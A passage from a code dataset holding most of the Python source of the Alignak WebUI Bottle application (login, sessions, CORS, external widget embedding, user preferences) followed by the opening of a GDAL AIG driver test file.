coverable\n app.config['host'] = args['--host']\n print(\"Listening interface from command line: %s\" % app.config.get('host', '127.0.0.1'))\n\nif '--port' in args and args['--port']: # pragma: no cover, tested but not coverable\n app.config['port'] = args['--port']\n print(\"Listening port from command line: %s\" % app.config.get('port', '5001'))\n\n# -----\n# Application log\n# -----\n# Set application log level (default is INFO\nlog_level = 'INFO'\nif app.config.get('%s.debug' % app_name, False): # pragma: no cover - not testable easily...\n print(\"-> Activated DEBUG log\")\n log_level = 'DEBUG'\nif os.environ.get('ALIGNAK_WEBUI_LOG_LEVEL'): # pragma: no cover, tested but not coverable\n log_level = os.environ.get('ALIGNAK_WEBUI_LOG_LEVEL', 'INFO')\n print(\"Application log level from environment: %s\" % log_level)\n\n# Search log file location\nlog_locations = [\n '/usr/local/var/log/%s' % app_name,\n '/var/log/%s' % app_name,\n '/tmp/%s' % app_name\n]\nif os.environ.get('ALIGNAK_WEBUI_LOG_DIR'): # pragma: no cover, tested but not coverable\n log_locations = [os.environ.get('ALIGNAK_WEBUI_LOG_DIR')]\n print(\"Application log directory from environment: %s\"\n % os.environ.get('ALIGNAK_WEBUI_LOG_DIR'))\nfor log_location in log_locations:\n if os.path.isdir(log_location):\n print(\"Log file location: %s\" % log_location)\n break\nelse:\n print(\"***** Log files location not found.\")\n print(\"***** Searched in: %s\" % log_locations)\n log_location = '/tmp/%s' % app_name\n os.mkdir(log_location)\n try:\n os.makedirs(log_location)\n dir_stat = os.stat(log_location)\n print(\"Created the directory: %s, stat: %s\" % (log_location, dir_stat))\n except OSError as exp:\n if exp.errno == errno.EEXIST and os.path.isdir(log_location):\n # Directory still exists...\n pass\n else:\n print(\"Daemon directory '%s' did not exist, and I could not create. Exception: %s\"\n % (log_location, exp))\n exit(3)\n\n# Search logger configuration\ncfg_log_filenames = [\n '/usr/local/etc/%s/logging.json' % app_name,\n '/etc/%s/logging.json' % app_name,\n '/usr/local/share/%s/etc/logging.json' % app_name,\n '~/%s/logging.json' % app_name,\n os.path.abspath('../etc/logging.json'),\n os.path.abspath('./etc/logging.json'),\n os.path.abspath('./logging.json'),\n]\nif os.environ.get('ALIGNAK_WEBUI_LOGGER_FILE'): # pragma: no cover, tested but not coverable\n cfg_log_filenames = [os.environ.get('ALIGNAK_WEBUI_LOGGER_FILE')]\n print(\"Application logger configuration file from environment: %s\"\n % os.environ.get('ALIGNAK_WEBUI_LOGGER_FILE'))\n\napp_logger_file = None\nlogger = None\nfor cfg_log_filename in cfg_log_filenames:\n if setup_logging(cfg_log_filename, log_location):\n logger = logging.getLogger(ROOT_LOGGER_NAME)\n logger.setLevel(log_level)\n print(\"Application logger configured from: %s\" % cfg_log_filename)\n break\nelse: # pragma: no cover, tested but not coverable\n print(\"***** Application logger configuration file not found.\")\n print(\"***** Searched in: %s\" % cfg_log_filenames)\n exit(2)\n\nlogger.info(\"--------------------------------------------------------------------------------\")\nlogger.info(\"%s, version %s\", __manifest__['name'], __manifest__['version'])\nlogger.info(\"Copyright %s\", __manifest__['copyright'])\nlogger.info(\"License: %s\", __manifest__['license'])\nlogger.info(\"--------------------------------------------------------------------------------\")\nlogger.info(\"Doc: %s\", __manifest__['doc'])\nlogger.info(\"Release notes: %s\", __manifest__['release'])\nlogger.info(\"--------------------------------------------------------------------------------\")\n\nlogger.info(\"Application logger configured from: %s\", cfg_log_filename)\n\nlogger.info(\"--------------------------------------------------------------------------------\")\nlogger.info(\"configuration read from: %s\", cfg_filename)\nlogger.info(\"listening on %s:%d (debug mode: %s)\",\n app.config.get('host', '127.0.0.1'), int(app.config.get('port', '5001')),\n app.config.get('%s.debug' % app_name, False))\nlogger.info(\"using Alignak Backend on %s\",\n app.config.get('%s.alignak_backend' % app_name, 'http://127.0.0.1:5000'))\nlogger.info(\"using Alignak Web Services on %s\",\n app.config.get('%s.alignak_ws' % app_name, 'http://127.0.0.1:8888'))\nlogger.info(\"--------------------------------------------------------------------------------\")\n\nlogger.debug(\"Application settings: \")\n# Make the 'application.key' also available as 'key'\nadd_to_config = {}\nfor key, value in sorted(app.config.items()):\n if key.startswith(app_name):\n add_to_config[key.replace(app_name + '.', '')] = value\n if isinstance(value, string_types):\n value = value.replace('\\n', '')\n logger.debug(\" %s = %s\", key, value)\nlogger.debug(\"--------------------------------------------------------------------------------\")\nlogger.debug(\"Webui settings: \")\nfor key, value in list(add_to_config.items()):\n app.config[key] = value\n logger.debug(\" %s = %s\", key, value)\nlogger.debug(\"--------------------------------------------------------------------------------\")\n\n# -----\n# Application localization\n# -----\n_ = init_localization(app)\n# Update configuration with translation method to use\napp.config['_'] = _\n# Provide translation methods to templates\nBaseTemplate.defaults['_'] = _\nprint(_(\"Language is English (default)...\"))\n\n# -----\n# Application extension\n# -----\nwebapp = WebUI(app, name=app_name, config=app.config)\nBaseTemplate.defaults['webui'] = webapp\napp.config['webui'] = webapp\n\n# -----\n# Application layout configuration\n# -----\nif os.environ.get('ALIGNAK_WEBUI_TOP_TEN_HOSTS', False):\n print(\"Application displays the top ten hosts\")\n BaseTemplate.defaults['top_ten_hosts'] = True\n\n\n# -----\n# Gloval application configuration\n# -----\nset_app_config(app.config)\n\n\n# -----\n# Application static files\n# -----\n@app.route('/static/')\ndef static(filename):\n \"\"\"Main application static files\n\n Plugins declare their own static routes under /plugins\n \"\"\"\n if not filename.startswith('plugins'):\n return static_file(\n filename, root=os.path.join(os.path.abspath(os.path.dirname(__file__)), 'static')\n )\n return static_file(\n filename, root=os.path.abspath(os.path.dirname(__file__))\n )\n\n\n# -----\n# Application modal windows\n# -----\n# todo: to be tested...\n@app.route('/modal/')\ndef give_modal(modal_name):\n \"\"\"Return template for a modal window\"\"\"\n logger.debug(\"get modal window named: %s\", modal_name)\n return template('modal_' + modal_name)\n\n\n# --------------------------------------------------------------------------------------------------\n# WebUI hooks\n# --------------------------------------------------------------------------------------------------\n@app.hook('config')\ndef on_config_change(_key, _value): # pragma: no cover, not yet tested\n \"\"\"Hook called if configuration dictionary changed\"\"\"\n logger.warning(\"application configuration changed, key: %s = %s\", _key, _value)\n if _key.startswith(app_name):\n app.config[_key.replace(app_name + '.', '')] = _value\n logger.warning(\"application configuration changed, *** key: %s = %s\",\n _key.replace(app_name + '.', ''), _value)\n\n\n@app.hook('before_request')\ndef before_request():\n # pylint: disable=unsupported-membership-test, unsubscriptable-object\n \"\"\"Function called since an HTTP request is received, and before any other function.\n\n Checks if a user session exists\n\n Some URLs do not need any authentication:\n - ping, heartbeat mechanism used for page or page elements refresh\n - login / logout\n - static files (js, css, ...)\n \"\"\"\n logger.debug(\"before_request, url: %s %s\", request.method, request.urlparts.path)\n\n # Static application and plugins files\n if request.urlparts.path.startswith('/static'):\n return\n\n # External URLs routing ...\n if request.urlparts.path.startswith('/external'):\n return\n\n # Login/logout specific URLs routing ...\n if request.urlparts.path.startswith('/login'):\n return\n if request.urlparts.path.startswith('/logout'):\n return\n\n # Get the server session (it always exist...)\n session = request.environ['beaker.session']\n sct = datetime.datetime.fromtimestamp(session['_creation_time']).strftime('%Y-%m-%d %H:%M:%S')\n sat = datetime.datetime.fromtimestamp(session['_accessed_time']).strftime('%Y-%m-%d %H:%M:%S')\n logger.debug(\"client: %s, route: %s, session: %s / %s - %s / %s\",\n request.environ.get('HTTP_X_FORWARDED_FOR') or request.environ.get('REMOTE_ADDR'),\n request.urlparts.path,\n session.id, sct, sat, session)\n\n current_user = None\n if 'current_user' in session:\n current_user = session['current_user']\n\n # Session authentication ...\n if not current_user:\n # ping and heartbeat URLs have a specific HTTP status code\n if request.urlparts.path.startswith('/ping'):\n abort(401, json.dumps({'status': 'ok', 'message': 'No user session'}))\n\n if request.urlparts.path.startswith('/heartbeat'):\n logger.error(\"no user: %s\", current_user)\n abort(401, json.dumps({'status': 'ok', 'message': 'Session expired'}))\n\n origin = request.environ.get('HTTP_X_FORWARDED_FOR') or request.environ.get('REMOTE_ADDR')\n logger.debug(\"client: %s, cookie: %s\", origin, request.environ.get('HTTP_COOKIE'))\n\n # Stop Alignak backend thread\n # ***** Not yet implemented...\n\n # Redirect to application login page\n logger.warning(\"Requesting %s. \"\n \"The session expired or there is no user in the session. \"\n \"Redirecting to the login page...\", request.urlparts.path)\n\n redirect('/login')\n\n # Authenticate the session user\n logger.debug(\"webapp: %s, request app: %s\", webapp, request.app)\n logger.info(\"current_user: %s\", current_user)\n if not webapp.user_authentication(current_user.token, None, session):\n # Redirect to application login page\n logger.warning(\"user in the session is not authenticated. \"\n \"Redirecting to the login page...\")\n redirect('/login')\n\n # Make session current user available in the templates\n BaseTemplate.defaults['current_user'] = current_user\n\n # Make session edition mode available in the templates\n if 'edition_mode' not in session:\n session['edition_mode'] = False\n BaseTemplate.defaults['edition_mode'] = session['edition_mode']\n logger.debug(\"before_request, edition mode: %s\", session['edition_mode'])\n\n logger.debug(\"webapp + datamgr: %s / %s\", webapp, webapp.datamgr)\n\n # Initialize data manager and make it available in the request and in the templates\n # if webapp.datamgr is None: # pragma: no cover, should never happen!\n webapp.datamgr = DataManager(request.app, session=session)\n if not webapp.datamgr.connected:\n redirect('/login')\n\n # Load initial objects from the DM\n # request.app.datamgr = DataManager(webapp, session=session)\n request.app.datamgr = webapp.datamgr\n request.app.datamgr.load()\n # Do not yet remove this... will be made later;)\n # if request.app.datamgr.logged_in_user.get_username() != 'admin':\n # logger.warning(\"client: %s, session: %s, cookie: %s, route: %s\",\n # request.environ.get('HTTP_X_FORWARDED_FOR') or\n # request.environ.get('REMOTE_ADDR'),\n # session.id,\n # request.environ.get('HTTP_COOKIE'),\n # request.urlparts.path)\n # logger.warning(\"request.app.datamgr: %s\", request.app.datamgr)\n # else:\n # logger.error(\"client: %s, session: %s, cookie: %s, route: %s\",\n # request.environ.get('HTTP_X_FORWARDED_FOR') or\n # request.environ.get('REMOTE_ADDR'),\n # session.id,\n # request.environ.get('HTTP_COOKIE'),\n # request.urlparts.path)\n # logger.error(\"request.app.datamgr: %s\", request.app.datamgr)\n logger.debug(\"request.app.datamgr: %s\", request.app.datamgr)\n BaseTemplate.defaults['datamgr'] = request.app.datamgr\n\n logger.debug(\"before_request, call function for route: %s\", request.urlparts.path)\n\n\n# --------------------------------------------------------------------------------------------------\n# Home page and login\n# --------------------------------------------------------------------------------------------------\n@app.route('/', 'GET')\ndef home_page():\n \"\"\"Display home page -> redirect to /Livestate\"\"\"\n try:\n redirect(request.app.get_url('Livestate'))\n except RouteBuildError: # pragma: no cover, should never happen!\n return \"No home page available in the application routes!\"\n\n return\n\n\n@app.route('/login', 'GET')\ndef user_login():\n \"\"\"Display user login page\"\"\"\n session = request.environ['beaker.session']\n message = None\n if 'login_message' in session and session['login_message']:\n message = session['login_message']\n session['login_message'] = None\n logger.warning(\"login page with error message: %s\", message)\n\n # Send login form\n return template(\n 'login', {\n 'message': message\n }\n )\n\n\n@app.route('/logout', 'GET')\ndef user_logout():\n \"\"\"Log-out the current logged-in user\n\n Clear and delete the user session\n \"\"\"\n # Delete the user session\n session = request.environ['beaker.session']\n session.delete()\n # Now session is an empty dictionary...\n\n # Log-out from application\n logger.info(\"Logout for current user\")\n\n redirect('/login')\n\n\n# todo: not yet implemented... see #172\ndef check_backend_connection(_app, token=None, interval=10): # pragma: no cover, not yet!\n \"\"\"Thread to check if backend connection is alive\"\"\"\n print(\"Thread for checking backend connection is alive with %s\" % app.config['alignak_backend'])\n\n object_type = 'user'\n params = {}\n while True:\n time.sleep(interval)\n if not token:\n continue\n print(\"Checking backend connection...\")\n try:\n result = _app.datamgr.my_backend.get(object_type, params=params, all_elements=False)\n logger.debug(\"check_backend_connection, found: %s: %s\", object_type, result)\n except BackendException as exp: # pragma: no cover, simple protection\n logger.exception(\"object_type, exception: %s\", exp)\n raise ValueError(\n '%s, search: %s was not found in the backend' % (object_type, params)\n )\n\n\n@app.route('/login', 'POST')\ndef user_auth():\n \"\"\"Receive user login parameters (username / password) to authenticate a user\n\n Allowed authentication:\n - username/password from a login form\n - token and empty password\n \"\"\"\n username = request.forms.get('username', None)\n password = request.forms.get('password', None)\n logger.info(\"login, user '%s' is signing in ...\", username)\n\n session = request.environ['beaker.session']\n session['login_message'] = None\n\n # Empty password?\n if not password: # pragma: no cover, should never happen, tested before calling this function!\n # Redirect to application login page with an error message\n session['login_message'] = _(\"Login is not authorized without a password\")\n logger.warning(\"user '%s' access denied, no passowrd provided\", username)\n redirect('/login')\n\n if not webapp.user_authentication(username, password, session):\n # Redirect to application login page with an error message\n if 'login_message' not in session:\n session['login_message'] = _(\"Invalid username or password\")\n logger.warning(\"user '%s' access denied, message: %s\", username, session['login_message'])\n redirect('/login')\n\n session['edition_mode'] = False\n logger.info(\"user '%s' (%s) signed in\", username, session['current_user'].name)\n\n # -----\n # Start Alignak backend thread\n # -----\n # pylint: disable=fixme\n # TODO: run backend connection check thread\n # cfg_backend_thread = threading.Thread(target=check_backend_connection,\n # name='backend_connection_check',\n # args=(app, session['current_user'].token, 10))\n # cfg_backend_thread.daemon = True\n # cfg_backend_thread.start()\n\n redirect('/')\n\n\n# --------------------------------------------------------------------------------------------------\n# Ping / heartbeat\n# --------------------------------------------------------------------------------------------------\n@app.route('/heartbeat')\ndef heartbeat():\n \"\"\"Application heartbeat\"\"\"\n session = request.environ['beaker.session']\n response.status = 200\n response.content_type = 'application/json'\n return json.dumps({'status': 'ok',\n 'message': \"Current logged-in user: %s\"\n % session['current_user'].get_username()})\n\n\n@app.route('/ping')\ndef ping():\n # pylint: disable=too-many-return-statements\n \"\"\"Request on /ping is a simple check alive that returns an information if UI refresh is needed\n\n Else, the specified `action` may be:\n - done, to inform that the server required action has been performed by the client\n - refresh, to get some information from a specified `template`\n\n If no action is specified, the application answers with a JSON pong ;)\n\n Used by the header refresh to update the hosts/services live state.\n \"\"\"\n session = request.environ['beaker.session']\n action = request.query.get('action', None)\n if action == 'done':\n # Acknowledge UI refresh\n session['refresh_required'] = False\n logger.debug(\"ping, refresh: %s\", session['refresh_required'])\n elif action == 'refresh':\n page_template = request.query.get('template', None)\n if page_template:\n # Send rendered template\n return template(page_template)\n\n # pragma: no cover - should not happen\n response.status = 200\n response.content_type = 'application/json'\n return json.dumps({'status': 'ok',\n 'message': 'missing template name. '\n 'Use /ping?action=refresh&template=name.'})\n elif action:\n response.status = 204\n response.content_type = 'application/json'\n return json.dumps({'status': 'ok',\n 'message': 'Unknown ping action parameter: %s' % action})\n\n response.status = 200\n response.content_type = 'application/json'\n return json.dumps({'status': 'ok', 'message': 'pong'})\n\n\n# --------------------------------------------------------------------------------------------------\n# WebUI routes\n# --------------------------------------------------------------------------------------------------\n# CORS decorator\ndef enable_cors(fn):\n \"\"\"CORS decorator\n\n Send the CORS headers for ajax request\n \"\"\"\n def _enable_cors(*_args, **_kwargs):\n # set CORS headers\n response.headers['Access-Control-Allow-Origin'] = \\\n request.app.config.get('cors_acao', 'http://127.0.0.1')\n response.headers['Access-Control-Allow-Methods'] = 'GET, POST, PUT, OPTIONS'\n response.headers['Access-Control-Allow-Headers'] = \\\n 'Origin, Accept, Authorization, X-HTTP-Method-Override, If-Match, Content-Type'\n response.headers['Access-Control-Allow-Credentials'] = 'true'\n\n if bottle.request.method != 'OPTIONS':\n # actual request; reply with the actual response\n return fn(*_args, **_kwargs)\n\n # response.status = 204\n return\n\n return _enable_cors\n\n\n@app.route('/external///', method=['GET', 'POST', 'OPTIONS'])\n@app.route('/external//', method=['GET', 'POST', 'OPTIONS'])\n@enable_cors\ndef external(widget_type, identifier, action=None):\n # pylint: disable=too-many-return-statements, unsupported-membership-test\n # pylint: disable=unsubscriptable-object, too-many-locals\n \"\"\"Application external identifier\n\n Use internal authentication (if a user is logged-in) or external basic authentication provided\n by the requiring application.\n\n Search in the known 'widget_type' (widget or table) to find the element 'identifier'.\n\n Use the 'links' parameter to prefix the navigation URLs.\n \"\"\"\n\n logger.warning(\"external request, url: %s %s\", request.method, request.urlparts.path)\n\n # Get the WebUI instance\n webui = request.app.config['webui']\n\n # Get the server session (it always exist...)\n session = request.environ['beaker.session']\n st = datetime.datetime.fromtimestamp(session['_creation_time']).strftime('%Y-%m-%d %H:%M:%S')\n origin = request.environ.get('HTTP_X_FORWARDED_FOR') or request.environ.get('REMOTE_ADDR')\n logger.debug(\"client: %s, session: %s / %s / %s\", origin, session.id, st, session)\n\n current_user = None\n if 'current_user' in session and session['current_user']:\n current_user = session['current_user']\n\n # Get the application instance authentication\n logger.debug(\"webapp: %s, request app: %s\", webapp, request.app)\n logger.debug(\"current_user: %s\", current_user)\n if not webapp.user_authentication(current_user.token, None, session):\n # Redirect to application login page\n logger.warning(\"External request. User in the session is not authenticated. \"\n \"Redirecting to the login page...\")\n redirect('/login')\n credentials = current_user.token + ':'\n\n else:\n # Authenticate external access...\n if 'Authorization' not in request.headers or not request.headers['Authorization']:\n logger.warning(\"external application access denied\")\n response.status = 401\n response.content_type = 'text/html'\n return _(\n '
    '\n '

    External access denied.

    '\n '

    To embed an Alignak WebUI widget or table, you must provide credentials.
    '\n 'Log into the Alignak WebUI with your credentials, or make a request '\n 'with a Basic-Authentication allowing access to Alignak backend.

    '\n '
    '\n )\n\n # Get HTTP authentication\n authentication = request.headers.get('Authorization')\n username, password = parse_auth(authentication)\n\n # Get the application instance authentication\n logger.debug(\"external application, checking authentication for %s\", username)\n if not webapp.user_authentication(username, password, session):\n logger.warning(\"external application access denied for %s\", username)\n response.status = 401\n response.content_type = 'text/html'\n return _(\n '
    '\n '

    External access denied.

    '\n '

    The provided credentials do not grant you access to Alignak WebUI.
    '\n 'Please provide proper credentials.

    '\n '
    '\n )\n\n current_user = session['current_user']\n credentials = current_user.token + ':'\n\n # Make session data available in the templates\n BaseTemplate.defaults['current_user'] = session['current_user']\n\n # Make data manager available in the request and in the templates\n request.app.datamgr = DataManager(webapp, session=session)\n request.app.datamgr.load()\n logger.warning(\"request.app.datamgr: %s\", request.app.datamgr)\n BaseTemplate.defaults['datamgr'] = request.app.datamgr\n\n logger.info(\"External request, element type: %s\", widget_type)\n\n if widget_type not in ['files', 'widget', 'table', 'list', 'host', 'service', 'user']:\n logger.warning(\"External application requested unknown type: %s\", widget_type)\n response.status = 409\n response.content_type = 'text/html'\n return _(\n '

    Unknown required type: %s.

    '\n '

    The required type is unknwown

    ' % widget_type\n )\n\n if widget_type == 'files':\n if identifier == 'js_list':\n response.status = 200\n response.content_type = 'application/json'\n return json.dumps({'status': 'ok', 'files': webui.js_list})\n\n if identifier == 'css_list':\n response.status = 200\n response.content_type = 'application/json'\n return json.dumps({'status': 'ok', 'files': webui.css_list})\n\n logger.warning(\"External application requested unknown files: %s\", identifier)\n response.status = 409\n response.content_type = 'application/json'\n return json.dumps({'status': 'ko', 'message': \"Unknown files list: %s\" % identifier})\n\n if widget_type == 'widget':\n found_widget = None\n for widget in webui.get_widgets_for('external'):\n if identifier == widget['id']:\n found_widget = widget\n break\n else:\n logger.warning(\"External application requested unknown widget: %s\", identifier)\n response.status = 409\n response.content_type = 'text/html'\n return _(\n '

    Unknown required widget: %s.

    '\n '

    The required widget is not available.

    ' % identifier\n )\n logger.debug(\"found widget: %s\", found_widget)\n\n embedded_element = found_widget['function'](\n embedded=True,\n identifier=identifier, credentials=credentials\n )\n\n if request.params.get('page', 'no') == 'no':\n return embedded_element\n\n return template('external_widget', {\n 'embedded_element': embedded_element\n })\n\n if widget_type == 'table':\n found_table = None\n for table in webui.get_tables_for('external'):\n if identifier == table['id']:\n found_table = table\n break\n else:\n logger.warning(\"External application requested unknown table: %s\", identifier)\n response.status = 409\n response.content_type = 'text/html'\n return _(\n '

    Unknown required table: %s.

    '\n '

    The required table is not available.

    ' % identifier\n )\n logger.info(\"Found table: %s\", found_table)\n\n if action and action in found_table['actions']:\n logger.info(\"Required action: %s = %s\", action, found_table['actions'][action])\n return found_table['actions'][action]()\n\n if request.params.get('page', 'no') == 'no':\n return found_table['function'](\n embedded=True, identifier=identifier, credentials=credentials\n )\n\n return template('external_table', {\n 'embedded_element': found_table['function'](\n embedded=True, identifier=identifier, credentials=credentials\n )\n })\n\n if widget_type == 'list':\n if identifier in webui.lists:\n return webui.lists[identifier]['function'](embedded=True)\n\n logger.warning(\"External application requested unknown list: %s\", identifier)\n response.status = 409\n response.content_type = 'text/html'\n return _(\n '

    Unknown required list: %s.

    '\n '

    The required list is not available.

    ' % identifier\n )\n\n if widget_type in ['host', 'service', 'user']:\n if not action:\n logger.warning(\n \"External application requested %s widget without widget name\", widget_type\n )\n response.status = 409\n response.content_type = 'text/html'\n return _(\n '

    Missing %s widget name.

    '\n '

    You must provide a widget name

    ' % widget_type\n )\n\n # Identifier is the element identifier, not the widget one !\n found_widget = None\n for widget in webui.get_widgets_for(widget_type):\n if action == widget['id']:\n found_widget = widget\n break\n else:\n logger.warning(\"External application requested unknown widget: %s\", action)\n response.status = 409\n response.content_type = 'text/html'\n return _(\n '

    Unknown required widget: %s.

    '\n '

    The required widget is not available.

    ' % action\n )\n logger.debug(\"Found %s widget: %s\", widget_type, found_widget)\n\n if request.params.get('page', 'no') == 'no':\n return found_widget['function'](\n element_id=identifier, widget_id=found_widget['id'],\n embedded=True, identifier=identifier, credentials=credentials\n )\n\n return template('external_widget', {\n 'embedded_element': found_widget['function'](\n element_id=identifier, widget_id=found_widget['id'],\n embedded=True, identifier=identifier, credentials=credentials\n )\n })\n\n\n# --------------------------------------------------------------------------------------------------\n# WebUI user's preferences\n# --------------------------------------------------------------------------------------------------\n@app.route('/preference/user', 'GET')\ndef get_user_preference():\n \"\"\"Get user's preferences for the current logged-in user\n\n Request parameters:\n\n - key, string identifying the parameter\n - default, default value if parameter does not exist\n \"\"\"\n user = request.environ['beaker.session']['current_user']\n datamgr = request.app.datamgr\n\n _key = request.query.get('key', None)\n if not _key:\n return WebUI.response_invalid_parameters(_('Missing mandatory parameters'))\n\n default = request.query.get('default', None)\n if default:\n try:\n default = json.loads(default)\n except Exception:\n pass\n\n key_value = datamgr.get_user_preferences(user, _key, default)\n if key_value is None:\n response.status = 200\n response.content_type = 'application/json'\n return json.dumps({'status': 'ko',\n 'message': 'Unknown key: %s' % _key})\n\n response.status = 200\n response.content_type = 'application/json'\n return json.dumps(key_value)\n\n\n@app.route('/preference/user/delete', 'GET')\ndef delete_user_preference():\n \"\"\"Delete current logged-in user's preference\n\n Request parameters:\n\n - key, string identifying the parameter\n \"\"\"\n user = request.environ['beaker.session']['current_user']\n datamgr = request.app.datamgr\n\n _key = request.query.get('key', None)\n if not _key:\n return WebUI.response_invalid_parameters(_('Missing mandatory parameters'))\n\n response.status = 200\n response.content_type = 'application/json'\n return json.dumps(datamgr.delete_user_preferences(user, _key))\n\n\n@app.route('/preference/user', 'POST')\ndef set_user_preference():\n \"\"\"Update current logged-in user's preference\n Request parameters:\n\n - key, string identifying the parameter\n - value, as a JSON formatted string\n \"\"\"\n user = request.environ['beaker.session']['current_user']\n datamgr = request.app.datamgr\n\n _key = request.forms.get('key', None)\n _value = request.forms.get('value', None)\n if _key is None or _value is None:\n return WebUI.response_invalid_parameters(_('Missing mandatory parameters'))\n\n try:\n _value = json.loads(_value)\n except Exception:\n pass\n\n if datamgr.set_user_preferences(user, _key, _value):\n return WebUI.response_ok(message=_('User preferences saved'))\n\n return WebUI.response_ko(message=_('Problem encountered while saving user preferences'))\n\n\n# --------------------------------------------------------------------------------------------------\n# WebUI edition mode\n# --------------------------------------------------------------------------------------------------\n@app.route('/edition_mode', 'POST')\n# User preferences page ...\ndef edition_mode():\n \"\"\"Set edition mode on / off\n\n The `state` parameter is 'on' or 'off' to enable / disable the edition mode in the session\n\n If this parameter is not present, this function do not change the current edition mode that\n is simply returned in the response.\n\n Returns a JSON response:\n {'edition_mode': False, 'message': 'Edition mode disabled'}\n \"\"\"\n # Session...\n session = request.environ['beaker.session']\n user = session['current_user']\n if not user.can_edit_configuration():\n logger.warning(\"Current user '%s' is not authorized to change edition_mode\",\n user.get_username())\n response.status = 401\n response.content_type = 'application/json'\n return json.dumps({'status': 'ko', 'message': 'Not authorized to change edition mode'})\n\n required_state = request.params.get('state', None)\n logger.debug(\"edition_mode, required state: %s\", required_state)\n\n if required_state is not None:\n # Make session edition mode available in the session and in the templates\n session['edition_mode'] = (required_state == 'on')\n BaseTemplate.defaults['edition_mode'] = session['edition_mode']\n logger.debug(\"edition_mode, session: %s\", session['edition_mode'])\n\n if session['edition_mode']:\n user_message = _('Edition mode enabled')\n else:\n user_message = _('Edition mode disabled')\n\n response.status = 200\n response.content_type = 'application/json'\n return json.dumps({'edition_mode': session['edition_mode'], 'message': user_message})\n\n\n# Bottle templates path\nTEMPLATE_PATH.append(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'views'))\n\n# Make Bottle raise the inner exceptions when WebUI is in test mode\n# This makes it easier to debug\nif os.environ.get('ALIGNAK_WEBUI_TEST', False):\n app.catchall = False\n\n# -----\n# Extend default WSGI application with a session middleware\n# -----\nsession_type = app.config.get('session.type', 'file')\nif os.environ.get('ALIGNAK_WEBUI_SESSION_TYPE'):\n session_type = os.environ.get('ALIGNAK_WEBUI_SESSION_TYPE')\n print(\"Session type from environment: %s\" % session_type)\n\nsession_data = app.config.get('session.session_data',\n os.path.join('/tmp/alignak-webui/sessions'))\nif os.environ.get('ALIGNAK_WEBUI_SESSION_DATA'):\n session_data = os.environ.get('ALIGNAK_WEBUI_SESSION_DATA')\n print(\"Session data from environment: %s\" % session_data)\n\nsession_opts = {\n 'session.type': session_type,\n 'session.data_dir': session_data,\n 'session.auto': app.config.get('session.auto', True),\n 'session.cookie_expires': app.config.get('session.cookie_expires', True),\n 'session.key': app.config.get('session.key', __manifest__['name']),\n 'session.save_accessed_time': True,\n 'session.timeout': app.config.get('session.timeout', None),\n 'session.data_serializer': app.config.get('session.data_serializer', 'pickle'),\n # Do not remove! For unit tests only...\n 'session.webtest_varname': __manifest__['name'],\n}\nlogger.debug(\"Session parameters: %s\", session_opts)\nsession_app = SessionMiddleware(app, session_opts)\n\n\ndef main(): # pragma: no cover, because of test mode\n \"\"\"Function called by the setup.py console script\"\"\"\n logger.info(\"Running Bottle, debug mode: %s\", app.config.get('debug', False))\n\n run(\n app=session_app,\n # server='cherrypy',\n host=app.config.get('host', '127.0.0.1'),\n port=int(app.config.get('port', 5001)),\n debug=app.config.get('debug', False),\n reloader=app.config.get('debug', False)\n )\n # remember to remove reloader=True and debug(True) when you move your application\n # from development to a production environment\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Alignak-monitoring-contrib/alignak-webui","sub_path":"alignak_webui/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":42677,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"38140251357","text":"import os\nimport shutil\n\nimport gdaltest\nimport pytest\n\nfrom osgeo import gdal\n\npytestmark = pytest.mark.require_driver(\"AIG\")\n\n###############################################################################\n# Read test of simple byte reference data.\n\n\ndef test_aigrid_1():\n\n tst = gdaltest.GDALTest(\"AIG\", \"aigrid/abc3x1\", 1, 3)\n tst.testOpen()\n\n\n###############################################################################\n# Verify some auxiliary data.\n\n\ndef test_aigrid_2():\n\n ds = gdal.Open(\"data/aigrid/abc3x1/prj.adf\")\n\n gt = ds.GetGeoTransform()\n\n assert (\n gt[0] == -0.5\n and gt[1] == 1.0\n and gt[2] == 0.0\n and gt[3] == 0.5\n and gt[4] == 0.0\n and gt[5] == -1.0\n ), \"Aigrid geotransform wrong.\"\n\n prj = ds.GetProjection()\n assert (\n prj.find(\n 'PROJCS[\"unnamed\",GEOGCS[\"GDA94\",DATUM[\"Geocentric_Datum_of_Australia_1994\"'\n )\n != -1\n ), (\"Projection does not match expected:\\n%s\" % prj)\n\n band1 = ds.GetRasterBand(1)\n assert band1.GetNoDataValue() == 255, \"Grid NODATA value wrong or missing.\"\n\n assert band1.DataType == gdal.GDT_Byte, \"Data type is not Byte!\"\n\n\n###############################################################################\n# Verify the colormap, and nodata setting for test file.\n\n\ndef test_aigrid_3():\n\n ds = gdal.Open(\"data/aigrid/abc3x1\")\n cm = ds.GetRasterBand(1).GetRasterColorTable()\n assert (\n cm.GetCount() == 256\n and cm.GetColorEntry(0) == (95, 113, 150, 255)\n and cm.GetColorEntry(1) == (95, 57, 29, 255)\n ), \"Wrong colormap entries\"\n\n cm = None\n\n assert ds.GetRasterBand(1).GetNoDataValue() == 255.0, \"Wrong nodata value.\"\n\n\n###############################################################################\n# Read test of simple byte reference data with data directory name in all uppercase\n\n\ndef test_aigrid_4():\n\n tst = gdaltest.GDALTest(\"AIG\", \"aigrid/ABC3X1UC\", 1, 3)\n tst.testOpen()\n\n\n###############################################################################\n# Verify the colormap, and nodata setting for test file with names of coverage directory and all files in it in all uppercase. Additionally also test for case where clr file resides in parent directory of coverage.\n\n\ndef test_aigrid_5():\n\n ds = gdal.Open(\"data/aigrid/ABC3X1UC\")\n cm = ds.GetRasterBand(1).GetRasterColorTable()\n assert (\n cm.GetCount() == 256\n and cm.GetColorEntry(0) == (95, 113, 150, 255)\n and cm.GetColorEntry(1) == (95, 57, 29, 255)\n ), \"Wrong colormap entries\"\n\n cm = None\n\n assert ds.GetRasterBand(1).GetNoDataValue() == 255.0, \"Wrong nodata value.\"\n\n\n###############################################################################\n# Verify dataset whose sta.adf is 24 bytes\n\n\ndef test_aigrid_6():\n\n ds = gdal.Open(\"data/aigrid/aigrid_sta_24bytes/teststa\")\n\n assert ds.GetRasterBand(1).GetMinimum() == 0.0, \"Wrong minimum\"\n\n assert ds.GetRasterBand(1).GetMaximum() == 2.0, \"Wrong maximum\"\n\n\n###############################################################################\n# Read twice a broken tile (https://github.com/OSGeo/gdal/issues/4316)\n\n\ndef test_aigrid_broken():\n\n if 